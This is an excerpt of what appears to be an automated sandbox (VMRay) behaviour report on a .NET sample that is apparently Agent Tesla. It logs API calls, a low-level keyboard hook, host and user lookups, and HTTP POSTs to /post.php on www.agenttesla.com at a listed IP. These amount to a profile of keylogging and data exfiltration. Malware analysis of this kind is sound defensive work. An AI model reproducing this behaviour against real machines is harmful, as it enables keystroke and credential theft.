Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_Put, address_out = 0x6a311da2 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_Delete, address_out = 0x6a311dbb True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_GetNames, address_out = 0x6a311dce True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_BeginEnumeration, address_out = 0x6a311de4 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_Next, address_out = 0x6a311df7 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_EndEnumeration, address_out = 0x6a311e13 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetCurrentApartmentType, address_out = 0x6a311d73 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetDemultiplexedStub, address_out = 0x6a3118fd True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = CreateInstanceEnumWmi, address_out = 0x6a311580 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = CreateClassEnumWmi, address_out = 0x6a3115f6 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = ExecQueryWmi, address_out = 0x6a31169e True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = ExecNotificationQueryWmi, address_out = 0x6a311717 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = PutInstanceWmi, address_out = 0x6a311790 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = PutClassWmi, address_out = 0x6a311810 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = CloneEnumWbemClassObject, address_out = 0x6a311890 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = ConnectServerWmi, address_out = 0x6a3124b7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x77af25dd True 1
Fn
User (2)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
Window (3)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = WindowsForms10.Window.0.app.0.33c0d9d, wndproc_parameter = 0 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.0.app.0.33c0d9d, index = -4, new_long = 2007967197 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.0.app.0.33c0d9d, index = -4, new_long = 13112074 True 1
Fn
System (13)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = XDUWTFONO True 2
Fn
Register Hook type = WH_KEYBOARD_LL, hookproc_address = 0xc8162a True 1
Fn
Get Info type = Operating System True 6
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Network Adapter Info - False 1
Fn
Get Network Adapter Info - True 1
Fn
Mutex (12)
»
Operation Additional Information Success Count Logfile
Create mutex_name = Global\.net clr networking True 10
Fn
Create mutex_name = Global\.net clr networking False 1
Fn
Open mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String name = appdata, result_out = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming True 1
Fn
Network Behavior
DNS (2)
»
Operation Additional Information Success Count Logfile
Resolve Name host = www.agenttesla.com, address_out = 46.166.182.114 True 1
Fn
Resolve Name host = survey-smiles.com, address_out = 127.0.0.1 True 1
Fn
TCP Sessions (4)
»
Information Value
Total Data Sent 0 bytes
Total Data Received 0 bytes
Contacted Host Count 2
Contacted Hosts 46.166.182.114, 127.0.0.1
TCP Session #1
»
Information Value
Remote Address 46.166.182.114
Remote Port 80
Local Address 192.168.0.53
Local Port 49159
Data Sent 0 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 46.166.182.114, remote_port = 80 True 1
Fn
Send flags = NO_FLAG_SET, size = 287, size_out = 287 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 4096, size_out = 367 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #2
»
Information Value
Remote Address 127.0.0.1
Remote Port 80
Local Address 192.168.0.53
Local Port -
Data Sent 0 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 127.0.0.1, remote_port = 80 False 1
Fn
Close type = SOCK_STREAM True 1
Fn
TCP Session #3
»
Information Value
Remote Address 46.166.182.114
Remote Port 80
Local Address 192.168.0.53
Local Port 49161
Data Sent 0 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 46.166.182.114, remote_port = 80 True 1
Fn
Send flags = NO_FLAG_SET, size = 263, size_out = 263 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 4096, size_out = 367 True 1
Fn
Data
Close type = SOCK_STREAM True 1
Fn
TCP Session #4
»
Information Value
Remote Address 127.0.0.1
Remote Port 80
Local Address 192.168.0.53
Local Port -
Data Sent 0 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 127.0.0.1, remote_port = 80 False 1
Fn
HTTP Sessions (2)
»
Information Value
Total Data Sent 550 bytes
Total Data Received 734 bytes
Contacted Host Count 1
Contacted Hosts 46.166.182.114
HTTP Session #1
»
Information Value
User Agent Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Server Name www.agenttesla.com
Server Port 80
Username -
Password -
Data Sent 287 bytes
Data Received 367 bytes
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) True 1
Fn
Open Connection protocol = http, server_name = www.agenttesla.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /post.php True 1
Fn
Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729), Content-Type: application/x-www-form-urlencoded, Host: www.agenttesla.com, Content-Length: 181, Expect: 100-continue, Connection: Keep-Alive, url = www.agenttesla.com/post.php True 1
Fn
Data
Read Response size = 4096, size_out = 367 True 1
Fn
Data
Close Session - True 3
Fn
HTTP Session #2
»
Information Value
User Agent Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Server Name www.agenttesla.com
Server Port 80
Username -
Password -
Data Sent 263 bytes
Data Received 367 bytes
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) True 1
Fn
Open Connection protocol = http, server_name = www.agenttesla.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /post.php True 1
Fn
Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729), Content-Type: application/x-www-form-urlencoded, Host: www.agenttesla.com, Content-Length: 227, Expect: 100-continue, url = www.agenttesla.com/post.php True 1
Fn
Data
Read Response size = 4096, size_out = 367 True 1
Fn
Data
Close Session - True 1
Fn
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image